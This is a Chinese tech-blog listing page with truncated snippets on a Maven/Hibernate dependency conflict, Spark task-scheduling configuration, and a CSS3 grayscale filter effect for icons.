    maven pom.xml关于hibernate的配置和异常信息如下,查了好多资料,问题还是没有解决。只知道是包冲突,就是不知道是哪个包....遇到这个问题的分享下是怎么解决的。。   maven pom:   <dependency> <groupId>org.hibernate</groupId> <ar
  • Spark 性能相关参数配置详解-任务调度篇 Stark_Summer sparkcachecpu任务调度yarn
    随着Spark的逐渐成熟完善, 越来越多的可配置参数被添加到Spark中来, 本文试图通过阐述这其中部分参数的工作原理和配置思路, 和大家一起探讨一下如何根据实际场合对Spark进行配置优化。   由于篇幅较长,所以在这里分篇组织,如果要看最新完整的网页版内容,可以戳这里:http://spark-config.readthedocs.org/,主要是便
  • css3滤镜 wangkeheng htmlcss
    经常看到一些网站的底部有一些灰色的图标,鼠标移入的时候会变亮,开始以为是js操作src或者bg呢,搜索了一下,发现了一个更好的方法:通过css3的滤镜方法。 html代码: <a href='' class='icon'><img src='utv.jpg' /></a> css代码: .icon{-webkit-filter: graysc
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他